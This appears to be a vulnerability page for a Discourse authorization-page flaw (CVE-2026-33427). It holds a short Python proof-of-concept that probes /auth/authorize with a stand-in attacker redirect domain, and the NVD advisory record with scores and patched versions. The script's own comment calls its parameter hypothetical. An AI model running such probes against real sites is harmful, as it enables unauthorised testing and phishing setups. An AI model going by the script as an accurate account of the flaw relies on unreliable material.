CVE-2026-33427

import requests # Proof of Concept for CVE-2026-33427 # Description: Demonstrates the open redirect vulnerability in Discourse. # The attacker can manipulate the authorization page to display a controlled domain. target_domain = "https://example-discourse.com" evil_domain = "https://attacker-controlled-site.com" # Hypothetical vulnerable endpoint parameter (actual param name depends on specific implementation) payload_url = f"{target_domain}/auth/authorize?redirect_uri={evil_domain}" print(f"Checking target: {target_domain}") try: # Sending request to check if the target reflects the evil domain response = requests.get(payload_url, allow_redirects=False) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location') if evil_domain in location: print(f"[+] Vulnerability Confirmed! Redirecting to: {location}") else: print("[-] Redirect occurred, but not to the attacker-controlled domain.") elif evil_domain in response.text: print(f"[+] Vulnerability Confirmed! Attacker domain found in response body (potential UI injection).") else: print("[-] Vulnerability not detected or patched.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33427", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:27.330", "lastModified": "2026-03-24T19:46:16.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Discourse is an open-source discussion platform. Prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, an unauthenticated attacker can cause a legitimate Discourse authorization page to display an attacker-controlled domain, facilitating social engineering attacks against users. Versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain a patch. No known workarounds are available."}, {"lang": "es", "value": "Discourse es una plataforma de discusión de código abierto. Antes de las versiones 2026.3.0-latest.1, 2026.2.1 y 2026.1.2, un atacante no autenticado puede hacer que una página legítima de autorización de Discourse muestre un dominio controlado por el atacante, facilitando ataques de ingeniería social contra los usuarios. Las versiones 2026.3.0-latest.1, 2026.2.1 y 2026.1.2 contienen un parche. No hay soluciones alternativas conocidas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.1.0", "versionEndExcluding": "2026.1.2", "matchCriteriaId": "4BE96625-3609-410C-B41E-4A824C1A57C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.2.0", "versionEndExcluding": "2026.2.1", "matchCriteriaId": "FD31CF04-CF2F-4FB9-8880-9243BC7671A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest:*:*:*", "matchCriteriaId": "E3FE9277-4F6B-4FD0-991F-F0FB8D226E1C"}]}]}], "references": [{"url": "https://github.com/discourse/discourse/security/advisories/GHSA-9vhg-2mx3-mqfr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}